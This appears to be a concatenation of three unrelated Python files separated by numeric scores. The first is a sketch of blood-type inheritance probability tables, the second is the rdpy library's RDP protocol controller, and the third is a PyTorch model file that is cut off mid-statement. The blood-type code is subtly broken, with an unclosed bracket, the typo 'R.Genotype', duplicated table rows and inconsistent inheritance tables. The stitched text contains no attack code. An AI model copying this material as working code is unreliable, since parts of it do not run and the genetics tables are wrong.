# http://anthro.palomar.edu/blood/table_of_ABO_and_Rh_blood_type_frequencies_in_US.htmw
p_Phenotype = P(Phenotype)
p_Phenotype.table([ [Phenotype.O, 0.44],
[Phenotype.A, 0.44],
[Phenotype.B, 0.10],
[Phenotype.AB,0.04]])
p_Genotype = P(Genotype)
p_Genotype.table([ [Genotype.OO, 1.0],
[Genotype.OA, 1.0],
[Genotype.AO, 1.0],
[Genotype.AA, 1.0],
[Genotype.OB, 1.0],
[Genotype.BO, 1.0],
[Genotype.BB, 1.0],
[Genotype.AB, 1.0],
[Genotype.BA, 1.0])
p_Genotype.normalize()
# https://en.wikipedia.org/wiki/Blood_type_distribution_by_country
# http://www.sciencedirect.com/science/article/pii/S1110863011000796
# https://www.hindawi.com/journals/bmri/2014/286810/
p_Phenotype_Genotype = P(Phenotype).given(Genotype)
p_Phenotype_Genotype.table([ [Phenotype.O, Genotype.OO, 1.0],
[Phenotype.A, Genotype.OA, 1.0],
[Phenotype.A, Genotype.AO, 1.0],
[Phenotype.A, Genotype.AA, 1.0],
[Phenotype.B, Genotype.OB, 1.0],
[Phenotype.B, Genotype.BO, 1.0],
[Phenotype.B, Genotype.BB, 1.0],
[Phenotype.AB, Genotype.AB, 1.0],
[Phenotype.AB, Genotype.BA, 1.0]])
p_Genotype_Phenotype = P(Genotype).given(Phenotype)
p_Genotype_Phenotype.table([ [Genotype.OO, Phenotype.O, 1.0],
[Genotype.OA, Phenotype.A, 0.33],
[Genotype.AO, Phenotype.A, 0.33],
[Genotype.AA, Phenotype.A, 0.34],
[Genotype.OB, Phenotype.B, 0.33],
[Genotype.BO, Phenotype.B, 0.33],
[Genotype.BB, Phenotype.B, 0.34],
[Genotype.AB, Phenotype.AB, 1.0],
[Genotype.BA, Phenotype.AB, 1.0]])
p_PhenotypeGenotype = p_Genotype_Phenotype * p_Phenotype
p_Genotype_ParentLeft = P(Genotype).given(Genotype)
p_Genotype_ParentLeft.table([ [Genotype.OO, L_Genotype.OO, 1.],
[Genotype.OO, L_Genotype.OA, 1.],
[Genotype.OO, L_Genotype.OB, 1.],
[Genotype.AO, L_Genotype.AO, 1.],
[Genotype.AO, L_Genotype.AA, 1.],
[Genotype.AO, L_Genotype.AB, 1.],
[Genotype.AB, L_Genotype.AO, 1.],
[Genotype.AB, L_Genotype.AA, 1.],
[Genotype.AB, L_Genotype.AB, 1.],
[Genotype.BO, L_Genotype.BO, 1.],
[Genotype.BO, L_Genotype.BB, 1.],
[Genotype.BO, L_Genotype.BA, 1.],
[Genotype.BA, L_Genotype.BO, 1.],
[Genotype.BA, L_Genotype.BB, 1.],
[Genotype.BA, L_Genotype.BA, 1.]])
p_Genotype_ParentRight = P(Genotype).given(Genotype)
p_Genotype_ParentRight.table([ [Genotype.OO, R_Genotype.OO, 1.],
[Genotype.OO, R_Genotype.AO, 1.],
[Genotype.OO, R_Genotype.BO, 1.],
[Genotype.OA, R_Genotype.OA, 1.],
[Genotype.OA, R_Genotype.AA, 1.],
[Genotype.OA, R_Genotype.BA, 1.],
[Genotype.BA, R_Genotype.OA, 1.],
[Genotype.BA, R_Genotype.AA, 1.],
[Genotype.BA, R_Genotype.BA, 1.],
[Genotype.OB, R_Genotype.OB, 1.],
[Genotype.OB, R_Genotype.BB, 1.],
[Genotype.OB, R_Genotype.AB, 1.],
[Genotype.AB, R_Genotype.OB, 1.],
[Genotype.AB, R_Genotype.BB, 1.],
[Genotype.AB, R_Genotype.AB, 1.]])
p_Genotype_Parent = P(Genotype).given(L_Genotype,R_Genotype)
p_Genotype_Parent.table([
[Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1],
[Genotype.OO, L_Genotype.AO, R.Genotype.OO, 1],
[Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1],
[Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1],
[Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1],
[Genotype.OO, L_Genotype.OO, R.Genotype.OO, 1]])
# p_Genotype_Phenotype = p_PhenotypeGenotype / p_Phenotype
"""
"""
P(P,G) = P(P|G)*P(G)
P(P,G) = P(G|P)*P(P)
P(G|P) = P(P|G)*P(G)/P(P)
P(P|Pp): sum( P|PmPd, Pd)
Grand Mom Pheno Uknown Parent Pheno
| | |
+--------+ | +------------------+
v | |
Grand Mom Blood | |
v v
Mom Pheno Dad Pheno Step Mom Pheno
| | | | | | |
| | | | +-------------+ | |
| | | | | | +-------+
+-+ +------+ +------+--+ +-+ +---+ | v
v | | | v | | Step Mom Blood
Mom Blood | | | Dad Blood v v
| | | Step Sister Pheno
v v +-----------+ |
Child Pheno v v
| Sibiling Pheno Step Sister Blood
v |
Child Blood v
Sibiling Blood
"""
"""
Possible Node instances:
blood : value
0 : .37
A : .38
B : .17
AB : .08
child_blood, parent_blood : value
A A : .3
0 A : .2
0 AB : 0
child_blood, parent_blood | grand_blood : value
A A | A : .3
0 A | 0 : .2
0 AB | 0 : 0
"""
| 0.00175 |
#
# Copyright (c) 2014-2015 Sylvain Peyrefitte
#
# This file is part of rdpy.
#
# rdpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Use to manage RDP stack in twisted
"""
from rdpy.core import layer
from rdpy.core.error import CallPureVirtualFuntion, InvalidValue
import pdu.layer
import pdu.data
import pdu.caps
import rdpy.core.log as log
import tpkt, x224, sec
from t125 import mcs, gcc
from nla import cssp, ntlm
class SecurityLevel(object):
"""
@summary: RDP security level
"""
RDP_LEVEL_RDP = 0
RDP_LEVEL_SSL = 1
RDP_LEVEL_NLA = 2
class RDPClientController(pdu.layer.PDUClientListener):
"""
Manage RDP stack as client
"""
def __init__(self):
#list of observer
self._clientObserver = []
#PDU layer
self._pduLayer = pdu.layer.Client(self)
#secure layer
self._secLayer = sec.Client(self._pduLayer)
#multi channel service
self._mcsLayer = mcs.Client(self._secLayer)
#transport pdu layer
self._x224Layer = x224.Client(self._mcsLayer)
#transport packet (protocol layer)
self._tpktLayer = tpkt.TPKT(self._x224Layer)
#fastpath stack
self._pduLayer.initFastPath(self._secLayer)
self._secLayer.initFastPath(self._tpktLayer)
#is pdu layer is ready to send
self._isReady = False
def getProtocol(self):
"""
@return: return Protocol layer for twisted
In case of RDP TPKT is the Raw layer
"""
return cssp.CSSP(self._tpktLayer, ntlm.NTLMv2(self._secLayer._info.domain.value, self._secLayer._info.userName.value, self._secLayer._info.password.value))
def getColorDepth(self):
"""
@return: color depth set by the server (15, 16, 24)
"""
return self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability.preferredBitsPerPixel.value
def getKeyEventUniCodeSupport(self):
"""
@return: True if server support unicode input
"""
return self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_INPUT].capability.inputFlags.value & pdu.caps.InputFlags.INPUT_FLAG_UNICODE
def setPerformanceSession(self):
"""
@summary: Set particular flag in RDP stack to avoid wall-paper, theme, menu animation etc...
"""
self._secLayer._info.extendedInfo.performanceFlags.value = sec.PerfFlag.PERF_DISABLE_WALLPAPER | sec.PerfFlag.PERF_DISABLE_MENUANIMATIONS | sec.PerfFlag.PERF_DISABLE_CURSOR_SHADOW | sec.PerfFlag.PERF_DISABLE_THEMING | sec.PerfFlag.PERF_DISABLE_FULLWINDOWDRAG
def setScreen(self, width, height):
"""
@summary: Set screen dim of session
@param width: width in pixel of screen
@param height: height in pixel of screen
"""
#set screen definition in MCS layer
self._mcsLayer._clientSettings.getBlock(gcc.MessageType.CS_CORE).desktopHeight.value = height
self._mcsLayer._clientSettings.getBlock(gcc.MessageType.CS_CORE).desktopWidth.value = width
def setUsername(self, username):
"""
@summary: Set the username for session
@param username: {string} username of session
"""
#username in PDU info packet
self._secLayer._info.userName.value = username
self._secLayer._licenceManager._username = username
def setPassword(self, password):
"""
@summary: Set password for session
@param password: {string} password of session
"""
self.setAutologon()
self._secLayer._info.password.value = password
def setDomain(self, domain):
"""
@summary: Set the windows domain of session
@param domain: {string} domain of session
"""
self._secLayer._info.domain.value = domain
def setAutologon(self):
"""
@summary: enable autologon
"""
self._secLayer._info.flag |= sec.InfoFlag.INFO_AUTOLOGON
def setAlternateShell(self, appName):
"""
@summary: set application name of app which start at the begining of session
@param appName: {string} application name
"""
self._secLayer._info.alternateShell.value = appName
def setKeyboardLayout(self, layout):
"""
@summary: keyboard layout
@param layout: us | fr
"""
if layout == "fr":
self._mcsLayer._clientSettings.CS_CORE.kbdLayout.value = gcc.KeyboardLayout.FRENCH
elif layout == "us":
self._mcsLayer._clientSettings.CS_CORE.kbdLayout.value = gcc.KeyboardLayout.US
def setHostname(self, hostname):
"""
@summary: set hostname of machine
"""
self._mcsLayer._clientSettings.CS_CORE.clientName.value = hostname[:15] + "\x00" * (15 - len(hostname))
self._secLayer._licenceManager._hostname = hostname
def setSecurityLevel(self, level):
"""
@summary: Request basic security
@param level: {SecurityLevel}
"""
if level == SecurityLevel.RDP_LEVEL_RDP:
self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_RDP
elif level == SecurityLevel.RDP_LEVEL_SSL:
self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_SSL
elif level == SecurityLevel.RDP_LEVEL_NLA:
self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_SSL | x224.Protocols.PROTOCOL_HYBRID
def addClientObserver(self, observer):
"""
@summary: Add observer to RDP protocol
@param observer: new observer to add
"""
self._clientObserver.append(observer)
def removeClientObserver(self, observer):
"""
@summary: Remove observer to RDP protocol stack
@param observer: observer to remove
"""
for i in range(0, len(self._clientObserver)):
if self._clientObserver[i] == observer:
del self._clientObserver[i]
return
def onUpdate(self, rectangles):
"""
@summary: Call when a bitmap data is received from update PDU
@param rectangles: [pdu.BitmapData] struct
"""
for observer in self._clientObserver:
#for each rectangle in update PDU
for rectangle in rectangles:
observer.onUpdate(rectangle.destLeft.value, rectangle.destTop.value, rectangle.destRight.value, rectangle.destBottom.value, rectangle.width.value, rectangle.height.value, rectangle.bitsPerPixel.value, rectangle.flags.value & pdu.data.BitmapFlag.BITMAP_COMPRESSION, rectangle.bitmapDataStream.value)
def onReady(self):
"""
@summary: Call when PDU layer is connected
"""
self._isReady = True
#signal all listener
for observer in self._clientObserver:
observer.onReady()
def onSessionReady(self):
"""
@summary: Call when Windows session is ready (connected)
"""
self._isReady = True
#signal all listener
for observer in self._clientObserver:
observer.onSessionReady()
def onClose(self):
"""
@summary: Event call when RDP stack is closed
"""
self._isReady = False
for observer in self._clientObserver:
observer.onClose()
def sendPointerEvent(self, x, y, button, isPressed):
"""
@summary: send pointer events
@param x: x position of pointer
@param y: y position of pointer
@param button: 1 or 2 or 3
@param isPressed: true if button is pressed or false if it's released
"""
if not self._isReady:
return
try:
if button == 4 or button == 5:
event = pdu.data.PointerExEvent()
if isPressed:
event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_DOWN
if button == 4:
event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_BUTTON1
elif button == 5:
event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_BUTTON2
else:
event = pdu.data.PointerEvent()
if isPressed:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_DOWN
if button == 1:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON1
elif button == 2:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON2
elif button == 3:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON3
else:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_MOVE
# position
event.xPos.value = x
event.yPos.value = y
# send proper event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send pointer event with incorrect position")
def sendWheelEvent(self, x, y, step, isNegative = False, isHorizontal = False):
"""
@summary: Send a mouse wheel event
@param x: x position of pointer
@param y: y position of pointer
@param step: number of step rolled
@param isHorizontal: horizontal wheel (default is vertical)
@param isNegative: is upper (default down)
"""
if not self._isReady:
return
try:
event = pdu.data.PointerEvent()
if isHorizontal:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_HWHEEL
else:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_WHEEL
if isNegative:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_WHEEL_NEGATIVE
event.pointerFlags.value |= (step & pdu.data.PointerFlag.WheelRotationMask)
#position
event.xPos.value = x
event.yPos.value = y
#send proper event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send wheel event with incorrect position")
def sendKeyEventScancode(self, code, isPressed, extended = False):
"""
@summary: Send a scan code to RDP stack
@param code: scan code
@param isPressed: True if key is pressed and false if it's released
@param extended: {boolean} extended scancode like ctr or win button
"""
if not self._isReady:
return
try:
event = pdu.data.ScancodeKeyEvent()
event.keyCode.value = code
if not isPressed:
event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_RELEASE
if extended:
event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_EXTENDED
#send event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send bad key event")
def sendKeyEventUnicode(self, code, isPressed):
"""
@summary: Send a scan code to RDP stack
@param code: unicode
@param isPressed: True if key is pressed and false if it's released
"""
if not self._isReady:
return
try:
event = pdu.data.UnicodeKeyEvent()
event.unicode.value = code
if not isPressed:
event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_RELEASE
#send event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send bad key event")
def sendRefreshOrder(self, left, top, right, bottom):
"""
@summary: Force server to resend a particular zone
@param left: left coordinate
@param top: top coordinate
@param right: right coordinate
@param bottom: bottom coordinate
"""
refreshPDU = pdu.data.RefreshRectPDU()
rect = pdu.data.InclusiveRectangle()
rect.left.value = left
rect.top.value = top
rect.right.value = right
rect.bottom.value = bottom
refreshPDU.areasToRefresh._array.append(rect)
self._pduLayer.sendDataPDU(refreshPDU)
def close(self):
"""
@summary: Close protocol stack
"""
self._pduLayer.close()
class RDPServerController(pdu.layer.PDUServerListener):
"""
@summary: Controller use in server side mode
"""
def __init__(self, colorDepth, privateKeyFileName = None, certificateFileName = None):
"""
@param privateKeyFileName: file contain server private key
@param certficiateFileName: file that contain public key
@param colorDepth: 15, 16, 24
"""
self._isReady = False
#list of observer
self._serverObserver = []
#build RDP protocol stack
self._pduLayer = pdu.layer.Server(self)
#secure layer
self._secLayer = sec.Server(self._pduLayer)
#multi channel service
self._mcsLayer = mcs.Server(self._secLayer)
#transport pdu layer
self._x224Layer = x224.Server(self._mcsLayer, privateKeyFileName, certificateFileName, False)
#transport packet (protocol layer)
self._tpktLayer = tpkt.TPKT(self._x224Layer)
#fastpath stack
self._pduLayer.initFastPath(self._secLayer)
self._secLayer.initFastPath(self._tpktLayer)
#set color depth of session
self.setColorDepth(colorDepth)
def close(self):
"""
@summary: Close protocol stack
"""
self._pduLayer.close()
def getProtocol(self):
"""
@return: the twisted protocol layer
in RDP case is TPKT layer
"""
return self._tpktLayer
def getHostname(self):
"""
@return: name of client (information done by RDP)
"""
return self._mcsLayer._clientSettings.CS_CORE.clientName.value.strip('\x00')
def getUsername(self):
"""
@summary: Must be call after on ready event else always empty string
@return: username send by client may be an empty string
"""
return self._secLayer._info.userName.value
def getPassword(self):
"""
@summary: Must be call after on ready event else always empty string
@return: password send by client may be an empty string
"""
return self._secLayer._info.password.value
def getDomain(self):
"""
@summary: Must be call after on ready event else always empty string
@return: domain send by client may be an empty string
"""
return self._secLayer._info.domain.value
def getCredentials(self):
"""
@summary: Must be call after on ready event else always empty string
@return: tuple(domain, username, password)
"""
return (self.getDomain(), self.getUsername(), self.getPassword())
def getColorDepth(self):
"""
@return: color depth define by server
"""
return self._colorDepth
def getScreen(self):
"""
@return: tuple(width, height) of client asked screen
"""
bitmapCap = self._pduLayer._clientCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability
return (bitmapCap.desktopWidth.value, bitmapCap.desktopHeight.value)
def addServerObserver(self, observer):
"""
@summary: Add observer to RDP protocol
@param observer: new observer to add
"""
self._serverObserver.append(observer)
def setColorDepth(self, colorDepth):
"""
@summary: Set color depth of session
if PDU stack is already connected send a deactive-reactive sequence
and an onReady message is re send when client is ready
@param colorDepth: {integer} depth of session (15, 16, 24)
"""
self._colorDepth = colorDepth
self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability.preferredBitsPerPixel.value = colorDepth
if self._isReady:
#restart connection sequence
self._isReady = False
self._pduLayer.sendPDU(pdu.data.DeactiveAllPDU())
def setKeyEventUnicodeSupport(self):
"""
@summary: Enable key event in unicode format
"""
self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_INPUT].capability.inputFlags.value |= pdu.caps.InputFlags.INPUT_FLAG_UNICODE
def onReady(self):
"""
@summary: RDP stack is now ready
"""
self._isReady = True
for observer in self._serverObserver:
observer.onReady()
def onClose(self):
"""
@summary: Event call when RDP stack is closed
"""
self._isReady = False
for observer in self._serverObserver:
observer.onClose()
def onSlowPathInput(self, slowPathInputEvents):
"""
@summary: Event call when slow path input are available
@param slowPathInputEvents: [data.SlowPathInputEvent]
"""
for observer in self._serverObserver:
for event in slowPathInputEvents:
#scan code
if event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_SCANCODE:
observer.onKeyEventScancode(event.slowPathInputData.keyCode.value, not (event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_RELEASE), bool(event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_EXTENDED))
#unicode
elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_UNICODE:
observer.onKeyEventUnicode(event.slowPathInputData.unicode.value, not (event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_RELEASE))
#mouse events
elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_MOUSE:
isPressed = event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_DOWN
button = 0
if event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON1:
button = 1
elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON2:
button = 2
elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON3:
button = 3
observer.onPointerEvent(event.slowPathInputData.xPos.value, event.slowPathInputData.yPos.value, button, isPressed)
elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_MOUSEX:
isPressed = event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_DOWN
button = 0
if event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_BUTTON1:
button = 4
elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_BUTTON2:
button = 5
observer.onPointerEvent(event.slowPathInputData.xPos.value, event.slowPathInputData.yPos.value, button, isPressed)
def sendUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
"""
@summary: send bitmap update
@param destLeft: xmin position
@param destTop: ymin position
@param destRight: xmax position because RDP can send bitmap with padding
@param destBottom: ymax position because RDP can send bitmap with padding
@param width: width of bitmap
@param height: height of bitmap
@param bitsPerPixel: number of bit per pixel
@param isCompress: use RLE compression
@param data: bitmap data
"""
if not self._isReady:
return
bitmapData = pdu.data.BitmapData(destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, data)
if isCompress:
bitmapData.flags.value = pdu.data.BitmapFlag.BITMAP_COMPRESSION
self._pduLayer.sendBitmapUpdatePDU([bitmapData])
class ClientFactory(layer.RawLayerClientFactory):
"""
@summary: Factory of Client RDP protocol
@param reason: twisted reason
"""
def connectionLost(self, csspLayer, reason):
#retrieve controller
tpktLayer = csspLayer._layer
x224Layer = tpktLayer._presentation
mcsLayer = x224Layer._presentation
secLayer = mcsLayer._channels[mcs.Channel.MCS_GLOBAL_CHANNEL]
pduLayer = secLayer._presentation
controller = pduLayer._listener
controller.onClose()
def buildRawLayer(self, addr):
"""
@summary: Function call from twisted and build rdp protocol stack
@param addr: destination address
"""
controller = RDPClientController()
self.buildObserver(controller, addr)
return controller.getProtocol()
def buildObserver(self, controller, addr):
"""
@summary: Build observer use for connection
@param controller: RDPClientController
@param addr: destination address
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "buildObserver", "ClientFactory"))
class ServerFactory(layer.RawLayerServerFactory):
"""
@summary: Factory of Server RDP protocol
"""
def __init__(self, colorDepth, privateKeyFileName = None, certificateFileName = None):
"""
@param colorDepth: color depth of session
@param privateKeyFileName: file contain server private key (if none -> back to standard RDP security)
@param certficiateFileName: file that contain public key (if none -> back to standard RDP security)
"""
self._colorDepth = colorDepth
self._privateKeyFileName = privateKeyFileName
self._certificateFileName = certificateFileName
def connectionLost(self, tpktLayer, reason):
"""
@param reason: twisted reason
"""
#retrieve controller
x224Layer = tpktLayer._presentation
mcsLayer = x224Layer._presentation
secLayer = mcsLayer._channels[mcs.Channel.MCS_GLOBAL_CHANNEL]
pduLayer = secLayer._presentation
controller = pduLayer._listener
controller.onClose()
def buildRawLayer(self, addr):
"""
@summary: Function call from twisted and build rdp protocol stack
@param addr: destination address
"""
controller = RDPServerController(self._colorDepth, self._privateKeyFileName, self._certificateFileName)
self.buildObserver(controller, addr)
return controller.getProtocol()
def buildObserver(self, controller, addr):
"""
@summary: Build observer use for connection
@param controller: RDP stack controller
@param addr: destination address
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "buildObserver", "ServerFactory"))
class RDPClientObserver(object):
"""
@summary: Class use to inform all RDP event handle by RDPY
"""
def __init__(self, controller):
"""
@param controller: RDP controller use to interact with protocol
"""
self._controller = controller
self._controller.addClientObserver(self)
def onReady(self):
"""
@summary: Stack is ready and connected
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onReady", "RDPClientObserver"))
def onSessionReady(self):
"""
@summary: Windows session is ready
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onSessionReady", "RDPClientObserver"))
def onClose(self):
"""
@summary: Stack is closes
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onClose", "RDPClientObserver"))
def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
"""
@summary: Notify bitmap update
@param destLeft: xmin position
@param destTop: ymin position
@param destRight: xmax position because RDP can send bitmap with padding
@param destBottom: ymax position because RDP can send bitmap with padding
@param width: width of bitmap
@param height: height of bitmap
@param bitsPerPixel: number of bit per pixel
@param isCompress: use RLE compression
@param data: bitmap data
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onUpdate", "RDPClientObserver"))
class RDPServerObserver(object):
"""
@summary: Class use to inform all RDP event handle by RDPY
"""
def __init__(self, controller):
"""
@param controller: RDP controller use to interact with protocol
"""
self._controller = controller
self._controller.addServerObserver(self)
def onReady(self):
"""
@summary: Stack is ready and connected
May be called after an setColorDepth too
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onReady", "RDPServerObserver"))
def onClose(self):
"""
@summary: Stack is closes
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onClose", "RDPClientObserver"))
def onKeyEventScancode(self, code, isPressed, isExtended):
"""
@summary: Event call when a keyboard event is catch in scan code format
@param code: {integer} scan code of key
@param isPressed: {boolean} True if key is down
@param isExtended: {boolean} True if a special key
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onKeyEventScanCode", "RDPServerObserver"))
def onKeyEventUnicode(self, code, isPressed):
"""
@summary: Event call when a keyboard event is catch in unicode format
@param code: unicode of key
@param isPressed: True if key is down
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onKeyEventUnicode", "RDPServerObserver"))
def onPointerEvent(self, x, y, button, isPressed):
"""
@summary: Event call on mouse event
@param x: x position
@param y: y position
@param button: 1, 2, 3, 4 or 5 button
@param isPressed: True if mouse button is pressed
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onPointerEvent", "RDPServerObserver")) | 0.007708 |
# MIT License
#
# Copyright (c) 2018 Jonathan Lorraine, Google LLC
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from .unet import UNet
from .resnet import ResNet18
class CBRStudent(nn.Module):
def __init__(self, num_channels, num_classes):
super(CBRStudent, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(num_channels, 32, kernel_size=5, stride=2, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
fcsize = 64 if num_channels == 1 else 256
self.fc_pi = nn.Linear(fcsize, num_classes)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.reshape(out.size(0), -1)
out_pi = self.fc_pi(out)
return out_pi
class UNetTeacher(nn.Module):
def __init__(self, num_channels, args):
super(UNetTeacher, self).__init__()
self.unet = UNet(in_channels=num_channels, n_classes=1, depth=2, wf=3, padding=True,
batch_norm=True, do_noise_channel=False, up_mode='upsample',use_identity_residual=False)
self.bg_weight = args.bg
self.min_std = args.min_std
self.max_std = args.max_std
self.use_exp = args.use_exp
self.dataset = args.dataset
def forward(self, x):
out = self.unet(x).squeeze() # should be of shape N x H x W
# print(out.shape)
out = F.softmax(out.reshape(x.size(0),-1))
out = out.reshape(x.size(0), x.size(2), x.size(3)).unsqueeze(1)
out = out.repeat(1, 2, 1, 1) # shape N x 2 x H x W
meshgrid_x, meshgrid_y = torch.meshgrid(torch.arange(x.size(2)),torch.arange(x.size(3)))
mesh = torch.stack([meshgrid_x, meshgrid_y], dim=0).unsqueeze(0).cuda()
mesh = mesh.repeat(x.size(0), 1,1,1) # shape N x 2 x H x W
mean = torch.sum(out*mesh, dim=[2,3]) # shape N x 2
std = self.min_std
mask = self.bg_weight + torch.exp(torch.sum(-1*(mean.view(-1,2, 1,1) - mesh)**2 / (2*std**2), dim=1))
return mask.unsqueeze(1)
class CBRTeacher(nn.Module):
def __init__(self, num_channels):
super(CBRTeacher, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(num_channels, 32, kernel_size=5, stride=2, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
fcsize = 64 if num_channels == 1 else 256
self.fc_cent = nn.Linear(fcsize, 2)
self.fc_std = nn.Linear(fcsize, 2)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.reshape(out.size(0), -1)
mean = x.size(2)//2 + x.size(2)//2*torch.tanh(self.fc_cent(out))
std = 2 + 10*torch.sigmoid(self.fc_std(out))
# print(mean.mean(dim=0), std.mean(dim=0))
meshgrid_x, meshgrid_y = torch.meshgrid(torch.arange(x.size(2)),torch.arange(x.size(3)))
mesh = torch.stack([meshgrid_x, meshgrid_y], dim=0).unsqueeze(0).cuda()
mesh = mesh.repeat(x.size(0), 1,1,1)
mask = 0.5 + torch.exp(torch.sum(-1*(mean.view(-1,2, 1,1) - mesh)**2 / (2*std**2).view(-1,2,1,1), dim=1))
print(mean.mean(), mean.std(),std.mean(), std.std())
return mask.unsqueeze(1).repeat(1, x.size(1), 1, 1)
class GaussianDropout(nn.Module):
def __init__(self, dropout):
super(GaussianDropout, self).__init__()
self.dropout = dropout
def forward(self, x):
"""
Sample noise e ~ N(1, alpha)
Multiply noise h = h_ * e
"""
# N(1, alpha)
if self.training:
dropout = F.sigmoid(self.dropout)
if x.is_cuda:
epsilon = torch.randn(x.size()).cuda() * (dropout / (1 - dropout)) + 1
else:
epsilon = torch.randn(x.size()) * (dropout / (1 - dropout)) + 1
return x * epsilon
else:
'''
epsilon = torch.randn(x.size()).double() * (model.dropout / (1 - model.dropout)) + 1
if x.is_cuda:
epsilon = epsilon.cuda()
return x * epsilon
'''
return x
class BernoulliDropout(nn.Module):
def __init__(self, dropout):
super(BernoulliDropout, self).__init__()
self.dropout = dropout
def forward(self, x):
"""
Sample noise e ~ N(1, alpha)
Multiply noise h = h_ * e
"""
temperature = 0.5
# N(1, alpha)
if self.training:
u = Variable(torch.rand(x.size()))
if x.is_cuda:
u = u.cuda()
z = F.sigmoid(self.dropout) + torch.log(u / (1 - u))
a = F.sigmoid(z / temperature)
return x * a
else:
return x
class reshape(nn.Module):
def __init__(self, size):
super(reshape, self).__init__()
self.size = size
def forward(self, x):
return x.view(-1, self.size)
class SimpleConvNet(nn.Module):
def __init__(self, batch_norm=True, dropType='bernoulli', conv_drop1=0.0, conv_drop2=0.0, fc_drop=0.0):
super(SimpleConvNet, self).__init__()
self.batch_norm = batch_norm
self.dropType = dropType
if dropType == 'bernoulli':
